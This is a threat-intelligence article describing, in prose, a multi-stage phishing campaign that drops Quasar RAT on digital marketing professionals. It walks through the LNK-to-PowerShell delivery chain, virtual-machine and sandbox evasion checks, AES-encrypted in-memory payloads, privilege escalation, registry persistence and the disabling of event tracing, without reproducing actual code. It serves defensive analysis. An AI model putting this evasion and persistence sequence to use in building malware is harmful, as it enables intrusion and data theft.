Analyzing a Multi-Stage Malware Attack Targeting Digital Marketing Professionals

Recent research by the Cyble Research and Intelligence Lab (CRIL) has brought to light a sophisticated multi-stage malware attack orchestrated by a Vietnamese threat actor. This campaign specifically targets job seekers and digital marketing professionals, employing various advanced tactics including the use of Quasar RAT, which allows attackers full control over compromised systems.  

The attack appears to originate from spam emails that contain phishing attachments. These emails are designed to entice recipients into opening an archive file that houses an LNK file masquerading as a PDF document. The sequence of events begins with the execution of the LNK file, which carries PowerShell commands intended to download highly obfuscated scripts from external sources. This strategy aims to bypass traditional detection methods, particularly in non-virtualized environments.  

The Quasar RAT Campaign by Vietnamese Threat Actor

Once the environment is verified to be free from analysis tools, the attackers decrypt the payload using hardcoded keys. This step activates Quasar RAT, enabling the threat actors to gain extensive access to the infected systems, facilitating data exfiltration, and the potential deployment of additional malware.  

In July 2022, the Vietnamese threat actor intensified its operations by disseminating Ducktail malware specifically aimed at digital marketing professionals. The group later expanded its arsenal to include other types of malware, notably information stealers and remote access trojans (RATs). The attackers also leveraged Malware-as-a-Service (MaaS) frameworks to create more versatile and scalable campaigns.  

This campaign is attributed to a Vietnamese threat group based on various indicators, including target selection, attack tools, and the delivery of malicious payloads,” denoted CRIL. These elements align closely with tactics used in previous campaigns identified by cybersecurity experts, reinforcing the suspicion of organized cybercriminal activity.  

The Mechanics of the Attack

The initial phase of the malware attack involves a malicious LNK file that executes PowerShell commands to download an additional script hosted on Dropbox. The specific link used for this operation is designed to execute the commands through the Invoke-Expression (IEX) and Invoke-RestMethod (irm) PowerShell commands.  

Once the PowerShell script is executed, it decodes a lure PDF file and a batch file, storing them in the Downloads folder under the names “PositionApplied_VoyMedia.pdf” and “output.bat.” The script then triggers these files using the Start-Process command.  

The primary target of this sophisticated campaign appears to be professionals in the digital marketing, e-commerce, and performance marketing sectors, particularly those focused on Meta (Facebook, Instagram) advertising in the United States. The lure documents used in the attack have been crafted to appeal specifically to this demographic, increasing the likelihood of engagement.  

Virtual Machine Evasion Techniques

One of the hallmark features of this multi-stage malware attack is its focus on evading detection by identifying whether it is operating within a virtual machine environment. The “output.bat” file employs Windows Management Instrumentation Command-line (WMIC) commands to ascertain the disk drive type and manufacturer, checking for signatures that indicate a virtual machine, such as “DADY HARDDISK” or manufacturers like “QEMU” and “VirtualBox.”  

If the environment is identified as virtual, the script exits to avoid detection. If not, it continues executing the obfuscated PowerShell script, effectively bypassing many security measures in place.  

Decryption and Execution

The PowerShell script also includes a decryption phase where it extracts base64 encoded strings from the “output.bat” file. These strings undergo AES decryption using hardcoded keys, followed by decompression through a GZip stream. This process results in a .NET executable that runs in memory and conducts further detection-evasion checks.  

Advanced Checks for Virtual Environments

The malware employs an intricate series of checks to ascertain if it is running in a sandbox or virtual environment. These methods include:  

• Checking for specific file names related to virtualization software like VMware and Parallels.
• Inspecting the presence of particular DLL modules that are characteristic of sandboxing solutions.
• Measuring time discrepancies in system tick counts to detect emulated environments.

If any of these checks indicate a virtual or sandboxed environment, the malware triggers an exception, halting further execution to avoid detection.  

Privilege Escalation and Persistence

Upon successful execution, the malware checks for administrative privileges. If the executable lacks these rights, it modifies its environment to gain elevated privileges using PowerShell commands or COM object invocations. Following privilege escalation, the malware copies itself to a hidden folder in the Windows directory and ensures it runs automatically on startup by modifying the Windows registry.  

Defense Evasion Strategies

The malware’s evasion techniques extend beyond initial execution. It modifies key Windows functions to disable event tracing, thereby obscuring its presence from security monitoring tools. The malware also encrypts and compresses sensitive data, including its payload, to further disguise its operations.  

Deployment of Quasar RAT

The final stage of the attack involves the execution of Quasar RAT, which has been adapted to reduce its detectability. This version of Quasar RAT is capable of executing a range of malicious tasks, including data theft and remote control of the infected system.  

Quasar RAT is configured with various parameters, including specific host addresses, startup keys, and log directories, which are all integral to its operation. The modification of its attributes helps in avoiding attribution and detection, allowing the Vietnamese threat group to operate with greater anonymity.